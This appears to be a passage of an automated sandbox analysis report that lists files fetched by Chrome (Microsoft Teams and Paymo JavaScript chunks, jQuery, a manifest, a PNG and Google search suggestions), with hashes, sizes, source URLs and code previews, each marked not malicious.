                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/816410-26421d0c40cd02ca.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816410],{816410:function(e){e.exports=function(){"use strict";const{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object;let{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;i||(i=function(e){return e}),a||(a=function(e){return e}),c||(c=function(e,t,n){return e.apply(t,n)}),s||(s=function(e,t){return new e(...t)});const u=b(Array.prototype.forEach),m=b(Array.prototype.pop),p=b(Array.prototype.push),f=b(String.prototype.toLowerCase),d=b(String.prototype.toString),h=b(String.prototype.match),g=b(String.prototype.replace),_=b(String.prototype.indexOf),T=b(String.prototype.trim),y=b(Object.prototype.hasOwnProperty),E=b(RegExp.prototype.test),A=S(TypeError);function N(e){return"number"==typeof e&&isNaN(e)}function b(e){return function(t){for(var n=arguments.length,o=new Array(n>1?n-1:0),r=1;r<n;r++)o[r-1]=argument
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (7979)
                                Category:downloaded
                                Size (bytes):8086
                                Entropy (8bit):4.542394330601067
                                Encrypted:false
                                SSDEEP:
                                MD5:BCD0E506BC6CECA01C797848A1E18B4D
                                SHA1:83C4C588CC01313141E40BAB05D3D5053CA55DEA
                                SHA-256:0847EE837BA3D9F99BC54F557E11FC4A1BCDEB998F68AD2A5875BC25C567B45D
                                SHA-512:8BBB26B17FC40CA917EF87302C0F7B0E616A8BD67F5F49085CBA52E256335B2C29311432CF28F9BDF17D4741D729D0E10E45A12A46B7A3D7ED226A5D12E63E27
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/49749-fa07bf3bd120c3c7.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[49749],{49749:(a,l,c)=>{c.d(l,{va_:()=>Z,i00:()=>e,aYy:()=>v,S61:()=>m,yDM:()=>L,nU0:()=>M,iAS:()=>H,p4K:()=>t,LMj:()=>u,Jtj:()=>i,OEF:()=>V,csZ:()=>s,OL4:()=>D,I0J:()=>U,KDM:()=>r,K4O:()=>A,APn:()=>n,VyF:()=>g,x7t:()=>R,IuD:()=>o});var h=c(693935);const Z=(0,h.U)("Delete16Regular","16",["M7 3h2a1 1 0 0 0-2 0ZM6 3a2 2 0 1 1 4 0h4a.5.5 0 0 1 0 1h-.56l-1.2 8.84A2.5 2.5 0 0 1 9.74 15h-3.5a2.5 2.5 0 0 1-2.48-2.16L2.57 4H2a.5.5 0 0 1 0-1h4Zm1 3.5a.5.5 0 0 0-1 0v5a.5.5 0 0 0 1 0v-5ZM9.5 6c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0v-5c0-.28.22-.5.5-.5Zm-4.74 6.7c.1.75.74 1.3 1.49 1.3h3.5a1.5 1.5 0 0 0 1.5-1.3L12.42 4H3.57l1.19 8.7Z"]),e=(0,h.U)("Delete20Filled","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM9 8a.5.5 0 0 0-1 0v6a.5.5 0 0 0 1 0V8Zm2.5-.5a.5.5 0 0 0-.5.5v6a.5.5 0
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (758)
                                Category:dropped
                                Size (bytes):759
                                Entropy (8bit):5.011019142484204
                                Encrypted:false
                                SSDEEP:
                                MD5:AA19F28193B9A7B6C75AB1EB26B6C48D
                                SHA1:89CCC5F9140C93F2C280488AB6C5F76083C2FF3C
                                SHA-256:4FFC2A2F9E32ED8AABC7B7247AF675DB9B11C3A8F7B314FB04FBA8B99E2ACDFC
                                SHA-512:0B77F6FDFB79D6BEAD20D5EB02668111D05CE41CC2541AE5E4A1D2E542674DD11FAC0983205ADC9409050B270226FAD04C61FBA5DCAC2387555B6822BA05219A
                                Malicious:false
                                Reputation:unknown
                                Preview:System.register([],function(n,c){"use strict";return{execute:function(){n({a:f,g:i});var l=n("c",typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{});function f(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function i(e){if(e.__esModule)return e;var o=e.default;if(typeof o=="function"){var t=function r(){return this instanceof r?Reflect.construct(o,arguments,this.constructor):o.apply(this,arguments)};t.prototype=o.prototype}else t={};return Object.defineProperty(t,"__esModule",{value:!0}),Object.keys(e).forEach(function(r){var u=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,u.get?u:{enumerable:!0,get:function(){return e[r]}})}),t}}}});.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (22831)
                                Category:dropped
                                Size (bytes):22939
                                Entropy (8bit):5.352894727770317
                                Encrypted:false
                                SSDEEP:
                                MD5:F70ED4AA684362939A4094E73EE14654
                                SHA1:41C54AD9CF605653A08C49BB3255CB84EFC7AC17
                                SHA-256:3F657976EC0B0E25DF25837FF6F97BF1EEED866950779CF0BF1B672C9154EAE4
                                SHA-512:106F239C6BA71AEE702DE05A95621AD0858AC65658A3C2462B2E3FD2AC8A9C862578D94AB64CF8EFB7714CB0CE259601147DE180FF97A5E1533BD62BCD6DF8F7
                                Malicious:false
                                Reputation:unknown
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[459872],{150321:(e,t,n)=>{"use strict";function r(){return r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},r.apply(this,arguments)}n.d(t,{A:()=>r})},90278:(e,t,n)=>{"use strict";n.d(t,{A:()=>o});var r=n(876653);function o(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,(0,r.A)(e,t)}},89968:(e,t,n)=>{"use strict";function r(e,t){if(null==e)return{};var n,r,o={},i=Object.keys(e);for(r=0;r<i.length;r++)n=i[r],t.indexOf(n)>=0||(o[n]=e[n]);return o}n.d(t,{A:()=>r})},876653:(e,t,n)=>{"use strict";function r(e,t){return r=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(e,t){return e.__proto__=t,e},r(e,t)}n.d(t,{A:()=>r})},353410:(e,t,n)=>{"use strict";function r(e,t){var n=Boolean(t.getRootNode&&t.getRootNode().host);if(e.contai
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (2941)
                                Category:dropped
                                Size (bytes):2942
                                Entropy (8bit):4.668256633691679
                                Encrypted:false
                                SSDEEP:
                                MD5:707426EE7255E957E4F5F0736C0CCFA6
                                SHA1:A1FBDF9C91302BC258522244BCC9BB881EB6DED0
                                SHA-256:172F0B2835E2ADEF6965A97572DFAA40E3A4B05A72C7170E752AB19FF0797B73
                                SHA-512:FACA538D668A75B74FC460ED2D3B89BDE60A2B495F8A000573946F39FDA2CE688AD2C94B28F31433AD9F80A88EF5B843758AFD15DF509557AEDE2C0EC5A2B1BF
                                Malicious:false
                                Reputation:unknown
                                Preview:System.register(["react"],(function(l,c){"use strict";var e;return{setters:[l=>{e=l}],execute:function(){l("S",(l=>e.createElement("svg",{width:"1em",height:"1em",viewBox:"0 0 14 14",xmlns:"http://www.w3.org/2000/svg",xmlnsXlink:"http://www.w3.org/1999/xlink",xmlSpace:"preserve","xmlns:serif":"http://www.serif.com/",style:{fillRule:"evenodd",clipRule:"evenodd",strokeLinejoin:"round",strokeMiterlimit:2},...l},e.createElement("path",{d:"M5.001,8.5c-0,-0.276 0.224,-0.5 0.5,-0.5l1.5,0c0.53,0 1.039,0.211 1.414,0.586c0.375,0.375 0.586,0.884 0.586,1.414l-0,2c-0,0.53 -0.211,1.039 -0.586,1.414c-0.375,0.375 -0.884,0.586 -1.414,0.586l-1.5,0c-0.276,0 -0.5,-0.224 -0.5,-0.5l-0,-5Zm6,3.5l2,0c0.276,-0 0.5,-0.224 0.5,-0.5c-0,-0.276 -0.224,-0.5 -0.5,-0.5l-2,0l-0,-1.5c-0,-0.133 0.053,-0.26 0.146,-0.354c0.094,-0.093 0.221,-0.146 0.354,-0.146l1.5,0c0.276,0 0.5,-0.224 0.5,-0.5c-0,-0.276 -0.224,-0.5 -0.5,-0.5l-1.5,0c-0.398,-0 -0.779,0.158 -1.061,0.439c-0.281,0.282 -0.439,0.663 -0.439,1.061l-0,4c-0,0.276 0.22
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JSON data
                                Category:downloaded
                                Size (bytes):401
                                Entropy (8bit):4.040729172023541
                                Encrypted:false
                                SSDEEP:
                                MD5:CB5A7738A542974E8EFB9BFDAB5F0DFC
                                SHA1:95A696008A1BD9ABDA0A4872F0F53AE819D96CF0
                                SHA-256:785A0719723FA34E4F57CE8978B173AC9FA25EDE8296C02CF644643B2F75F488
                                SHA-512:624C058CC0C069F432D1A2093B7DDF4B072E05A2B3C8701AF9AD9A0C07507427150CE3B9B1A1611AA2630BA76A165B38BA29E9174B43F380CA527A6DBDE975DB
                                Malicious:false
                                Reputation:unknown
                                URL:https://app.paymoapp.com/favicons/manifest.json
                                Preview:{. "name": "",. "icons": [. {. "src": "android-chrome-192x192.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "android-chrome-512x512.png",. "sizes": "512x512",. "type": "image/png". }. ],. "theme_color": "#ffffff",. "background_color": "#ffffff",. "display": "standalone".}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                Category:downloaded
                                Size (bytes):61
                                Entropy (8bit):3.990210155325004
                                Encrypted:false
                                SSDEEP:
                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                Malicious:false
                                Reputation:unknown
                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):110335
                                Entropy (8bit):5.0224307005678686
                                Encrypted:false
                                SSDEEP:
                                MD5:214D956E3CCEB03D45BA8EEF688CC64B
                                SHA1:051A81084C125E846CBF96F6159E8CF2814313ED
                                SHA-256:8C834B7132470B8E36679CF844F38CB6B9C3B3177B9DB0261408366BD4618828
                                SHA-512:147C8514367795C09E7DE87B50846202B38B86FBAB4F69B9C94C96877BEEC997637C0CE175CAB23D1B870C39D35B2203685ABE747E2BCBC089FFB27A698EF049
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/364713-3b9c2490aac0a041.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[364713],{450787:(t,e,a)=>{"use strict";a.d(e,{I:()=>i});var s=a(554186);class i{constructor(){this._id=(0,s.v4)(),this._dispose=null,this._data={}}get id(){return this._id}get data(){return this._data}set proximitySource(t){this._data["MeetingRoom.proximitySource"]=t}set alertName(t){this._data["DataBag.alertName"]=t}set allAliasesTurnedOff(t){this._data["DataBag.allAliasesTurnedOff"]=t}set allAliasesWithPrivateVisibility(t){this._data["DataBag.allAliasesWithPrivateVisibility"]=t}set tabAppCount(t){this._data["DataBag.tabAppCount"]=t}set appId(t){this._data["DataBag.appId"]=t}set appInstallScope(t){this._data["DataBag.appInstallScope"]=t}set appStoreOriginSource(t){this._data["DataBag.appStoreOriginSource"]=t}set isUserPartOfMeetingAttendeesCount(t){this._data["DataBag.activeCallsCount"]=t}set setIsMeetingGame(t){this._data["DataBag.isMeetingGame"]=t}set autoreconnectShown(t){this._data["
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (62375), with no line terminators
                                Category:dropped
                                Size (bytes):73859
                                Entropy (8bit):5.5092296140052985
                                Encrypted:false
                                SSDEEP:
                                MD5:F9CFAD83CEA140B7C8BFCD7234676ED4
                                SHA1:061A52298D46B62598CAB7959FC11D58A548362E
                                SHA-256:A6DBF4B85629437AD65DBFDD733C99ED566893FBC599C8CAAC0B015C73F471B8
                                SHA-512:A1C72677FCDA27DAD02CB6A935411D863C38FF8A3E76B88685EE88FDE77E68902F79A4302749405EFF8E9D809395308DCB81E7E639206AFD83E87EEE25D7C3B1
                                Malicious:false
                                Reputation:unknown
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[710639],{861782:(t,e,r)=>{var i=r(8605),s=r(548738),n={__proto__:null,style:!0,script:!0,xmp:!0,iframe:!0,noembed:!0,noframes:!0,plaintext:!0,noscript:!0};var a={__proto__:null,area:!0,base:!0,basefont:!0,br:!0,col:!0,command:!0,embed:!0,frame:!0,hr:!0,img:!0,input:!0,isindex:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0},o=t.exports=function(t,e){Array.isArray(t)||t.cheerio||(t=[t]),e=e||{};for(var r="",s=0;s<t.length;s++){var n=t[s];"root"===n.type?r+=o(n.children,e):i.isTag(n)?r+=c(n,e):n.type===i.Directive?r+=h(n):n.type===i.Comment?r+=p(n):n.type===i.CDATA?r+=u(n):r+=l(n,e)}return r};function c(t,e){"svg"===t.name&&(e={decodeEntities:e.decodeEntities,xmlMode:!0});var r="<"+t.name,i=function(t,e){if(t){var r,i="";for(var n in t)i&&(i+=" "),i+=n,(null!==(r=t[n])&&""!==r||e.xmlMode)&&(i+='="'+(e.decodeEntities?s.encodeXML(r):r)+'"');return i}}(t.attribs,e);return i&&(r
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (23843)
                                Category:downloaded
                                Size (bytes):23950
                                Entropy (8bit):5.2873236427167285
                                Encrypted:false
                                SSDEEP:
                                MD5:0CD128F474BDB7DF9CBF23434A5AEF84
                                SHA1:A1C47BCD629EA66EF894708F616A46A282739FA4
                                SHA-256:625BF36E9521DE1869ACA6B774360102690962CE3860D8AE6E6FC0A8CAC14305
                                SHA-512:9E130DD780FBEF887C2ECC7EEB17A9CD52DACAAE7D44C604CA5C95EC9F5D3E5701BD8D54F1EA0ACE9C740D83BE9462BFF769AF9B64A32AF7C7B00FEEFBE68736
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/34655-d47d0d947ba2b72d.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[34655],{34655:(e,t,r)=>{r.d(t,{TL:()=>a,XY:()=>n,f2:()=>s,O4:()=>d,LD:()=>l,sj:()=>c,Ir:()=>C,lQ:()=>T,J2:()=>u,dy:()=>E,c1:()=>S,Kw:()=>I,N2:()=>m,Vx:()=>p,Xn:()=>A,Xk:()=>v,qj:()=>R,ak:()=>D,mA:()=>g,JN:()=>k,ow:()=>L,Tl:()=>F,XK:()=>U,Mh:()=>O});var a,i,n,o=r(724801);!function(e){e[e.Presenting=0]="Presenting",e[e.InCall=1]="InCall",e[e.InBroadcast=2]="InBroadcast",e[e.Interactive=3]="Interactive",e[e.Inactive=4]="Inactive",e[e.LongInactive=5]="LongInactive",e[e.Disabled=6]="Disabled",e[e.Disconnected=7]="Disconnected",e[e.Offline=8]="Offline",e[e.Uninitialized=9]="Uninitialized"}(a||(a={})),function(e){e.AppLogout="appLogout"}(i||(i={})),function(e){e[e.error=0]="error",e[e.warn=1]="warn",e[e.info=2]="info",e[e.verbose=3]="verbose"}(n||(n={}));const s={second:1e3,minute:6e4,tenMinutes:6e5};var d,l,c,C;!function(e){e.Deserialization="Deserialization",e.Unknown="Unknown",e.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):82543
                                Entropy (8bit):4.439588799496337
                                Encrypted:false
                                SSDEEP:
                                MD5:E4EDA3353C02D83B0BAE1EA3F184DED6
                                SHA1:50DF4C1C65D6B4D6CB6B1E84BBEEB342AE70EABD
                                SHA-256:5DF8F1277C43DF55DBC88568A594E271C3956084AA2F0C2CFFD84C34E2F6A4AF
                                SHA-512:87058927EBD1CBBD7BA777AF33405169C1C558285E5137773BBE82E322049D3B171A4F303DA009A0568C5660C9FE39A06F35497CE0E1555933B4C3BCC532E6EC
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/169233-94071e9ab8bbe183.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[169233],{169233:(a,l,h)=>{h.d(l,{ZtX:()=>c,vXm:()=>v,on3:()=>e,m61:()=>m,Yfv:()=>A,wbC:()=>M,l1P:()=>r,dcr:()=>H,$Vp:()=>V,tX_:()=>U,K4k:()=>i,gNM:()=>d,C$A:()=>C,QUO:()=>L,FV:()=>R,Jkc:()=>o,qw7:()=>t,eAs:()=>u,Co4:()=>n,ETz:()=>g,xyh:()=>F,BjN:()=>w,f9S:()=>p,Rl_:()=>s,tXH:()=>f,JAW:()=>k,dIR:()=>B,XST:()=>S,lOY:()=>I,Tu1:()=>E,mho:()=>b,g0A:()=>D,PCP:()=>_,hyw:()=>y,qTc:()=>T,cUx:()=>x,ryW:()=>X,lkJ:()=>z,cDX:()=>G,M5p:()=>O,__C:()=>Q,muQ:()=>q,SEp:()=>j,Yx5:()=>J,IEM:()=>P,SZX:()=>Y,abA:()=>W,mdF:()=>N,_tw:()=>K,a1m:()=>$,LI8:()=>aa,Tp5:()=>la,fXC:()=>ha,ZRs:()=>Za,nQe:()=>ca,l_X:()=>va,SGl:()=>ea,MZl:()=>ma,up$:()=>Aa,IM1:()=>Ma,iju:()=>ra,uEE:()=>Ha,a2s:()=>Va,Yi9:()=>Ua,iBC:()=>ia,GN6:()=>da,UEN:()=>Ca,Tdu:()=>La,Rvv:()=>Ra,Sub:()=>oa,qqS:()=>ta,ZJF:()=>ua,nn9:()=>na,W9G:()=>ga,Um6:()=>Fa,oYc:()=>wa,O35:()=>pa,PDr:()=>sa,P0w:()=>fa,r$t:()=>ka,JdG:()=>Ba,xKI:()=>Sa,rCW:
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:dropped
                                Size (bytes):89501
                                Entropy (8bit):5.289893677458563
                                Encrypted:false
                                SSDEEP:
                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                Malicious:false
                                Reputation:unknown
                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (838)
                                Category:downloaded
                                Size (bytes):843
                                Entropy (8bit):5.17409540035915
                                Encrypted:false
                                SSDEEP:
                                MD5:FBFBE3491540DEBDAD7346D1AFD4C62A
                                SHA1:1723E78E9E4E54D3288D050BDFDA462C99D75119
                                SHA-256:685D9591F8C7BE6334172685F04D0BE6587F2F5DD5CBC8D1EAD1EAE8AFB61642
                                SHA-512:7A63A94FBD5737DF013D4A3B35863A8D626744703975CF1519E3E4D70E8E97A2F905DE78EE04A1935274AEC515C73C84B1BF549FF8F38660FC429BF2C54B9B01
                                Malicious:false
                                Reputation:unknown
                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                Preview:)]}'.["",["ravichandran ashwin retirement","nasa astronauts stuck in space","frito lay recalled potato chips","blue bloods finale ratings","north pole monopoly go","wisconsin snow forecast","bird flu california emergency","mystery drones new jersey"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":1062079369260486394,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (15028)
                                Category:downloaded
                                Size (bytes):15136
                                Entropy (8bit):5.353622533370098
                                Encrypted:false
                                SSDEEP:
                                MD5:6079A78034C6177D22105DF67701A845
                                SHA1:BBED8DA8D6A18783CD50DF12F63020D283DCA746
                                SHA-256:30530BB045C4F2C89D9AE2A71977804251E888C737B783DD068630713803A38F
                                SHA-512:C29659B41F17D032BD70086B4D03EA12686B19F430F4656C35E69AAE8604F913C12F093CF3351CBCABF667EAEE580BC096D2FA8346C310398EB4F9AFD8E7FF6E
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/421318-8ae476c777a9a79b.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[421318],{851706:(e,t,n)=>{n.d(t,{E:()=>V});var r=n(513432),o=n(48374),a=n(883027),i=n(602835),l=n(691478),u=n(164093),c=n(716300),s=n(250452),d=n(478304),f=n(31152),v=n(35871),b=n(103735);const m=(0,b.D)("r6pzz3z",null),p=(0,b.D)("r144vlu9",null);var y=n(115170),h=n(123082);const g=[{opacity:0},{opacity:1}],E=(0,y.$)({enter:{keyframes:g,easing:h.TV.curveLinear,duration:h.TV.durationGentle},exit:{keyframes:[...g].reverse(),easing:h.TV.curveLinear,duration:h.TV.durationGentle}});var k=n(712944);const D=(e,t)=>{const n=(0,k.Z)(),b=(0,f.e4)((e=>e.modalType)),y=(0,f.e4)((e=>e.isNestedDialog)),h=(0,f.e4)((e=>e.modalAttributes)),g=(0,f.e4)((e=>e.dialogRef)),D=(0,f.e4)((e=>e.requestOpenChange)),w=(0,f.e4)((e=>e.dialogTitleId)),C=(0,f.e4)((e=>e.open)),L=(0,i.D)((t=>{var n,r;(0,l.g)(e.backdrop)&&(null===(n=(r=e.backdrop).onClick)||void 0===n||n.call(r,t));"modal"!==b||t.isDefaultPreven
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (20588)
                                Category:dropped
                                Size (bytes):20703
                                Entropy (8bit):5.264666815172731
                                Encrypted:false
                                SSDEEP:
                                MD5:69ECA731C1AAF4A9525E88C0A4F50F9D
                                SHA1:B19B3D104E0BA17A8C9DB9804E68AA1E12583DA8
                                SHA-256:5D6F5EFCC03C21420B1E057DA2C8F1307E88C17BA419DEB68CAC0C639208F031
                                SHA-512:C1663BF699B799D65A419C99101CE4324B68F5FE103BE28F6CDD312D0AC5A65DC6F668423B2C227D9B49075AD63B96897E6D39AC847CD484258334EF159BCA98
                                Malicious:false
                                Reputation:unknown
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945920],{145916:(t,e,i)=>{const r=i(710639),a=i(367323),{isPlainObject:n}=i(698286),s=i(944244),o=i(391318),{parse:l}=i(589059),d=["img","audio","video","picture","svg","object","map","iframe","embed"],c=["script","style"];function u(t,e){t&&Object.keys(t).forEach((function(i){e(t[i],i)}))}function f(t,e){return{}.hasOwnProperty.call(t,e)}function m(t,e){const i=[];return u(t,(function(t){e(t)&&i.push(t)})),i}t.exports=g,t.exports.default=g,Object.defineProperty(t.exports,"__esModule",{value:!0});const h=/^[^\0\t\n\f\r /<=>]+$/;function g(t,e,i){if(null==t)return"";let b="",w="";function y(t,e){const i=this;this.tag=t,this.attribs=e||{},this.tagPosition=b.length,this.text="",this.mediaChildren=[],this.updateParentNodeText=function(){if(H.length){H[H.length-1].text+=i.text}},this.updateParentNodeMediaChildren=function(){if(H.length&&d.includes(this.tag)){H[H.length-1].mediaChildren.push(th
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (5697)
                                Category:downloaded
                                Size (bytes):5698
                                Entropy (8bit):4.933304834701751
                                Encrypted:false
                                SSDEEP:
                                MD5:B7F509A574E38BD3E871FD47A3846B59
                                SHA1:68AEFB498706A9F56145A7C8FAA01DEF325E2153
                                SHA-256:3E3F708630858DD618C7DB369C69C93D07420D18E997AEA045624B0A27322CE4
                                SHA-512:323C9E82921AD02F9FBFF6C7A36B2E3B0734EB5CC3BB79F15912F8A55BB563F137B75B902E887704B4C6D1B2F876FC7836EA21153006C85EAF5DEB8AEA44E66C
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/accounting/3.182.65/TranslationProvider-f13b9eaa.js
                                Preview:System.register(["react","@paymo/translation","./index-b0302b44.js"],(function(e,C){"use strict";var t,n,r,o,i,a,s,L;return{setters:[e=>{t=e,n=e.useState,r=e.useEffect,o=e.memo,i=e.default},e=>{a=e.TranslationProvider,s=e.useTranslation},e=>{L=e.u}],execute:function(){var C={exports:{}};function l(){}function c(){}c.resetWarningCache=l;C.exports=function(){function e(e,C,t,n,r,o){if("SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"!==o){var i=new Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw i.name="Invariant Violation",i}}function C(){return e}e.isRequired=e;var t={array:e,bigint:e,bool:e,func:e,number:e,object:e,string:e,symbol:e,any:e,arrayOf:C,element:e,elementType:e,instanceOf:C,node:e,objectOf:C,oneOf:C,oneOfType:C,shape:C,exact:C,checkPropTypes:c,resetWarningCache:l};return t.PropTypes=t,t}();var p=C.exports;e("S",(e=>t.createElement("svg"
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (14104)
                                Category:dropped
                                Size (bytes):14212
                                Entropy (8bit):4.793888724643343
                                Encrypted:false
                                SSDEEP:
                                MD5:C779A3CD7F261EFEA6776C15C84F5548
                                SHA1:C330D22070332B3DAB44F90167FA26F32D5F56CF
                                SHA-256:39B145AA7B80DB2B82502A5237A71CE7AD23F6A24F316819765CF6CAE41C4F97
                                SHA-512:F9D89DBFBB56766357ED4374490AD7901022E54B9444376C492B38CA288824A5DD2273D38B01F12C7C8809E1C1F02E7F671888A674F761FF0668FFDEE038DC53
                                Malicious:false
                                Reputation:unknown
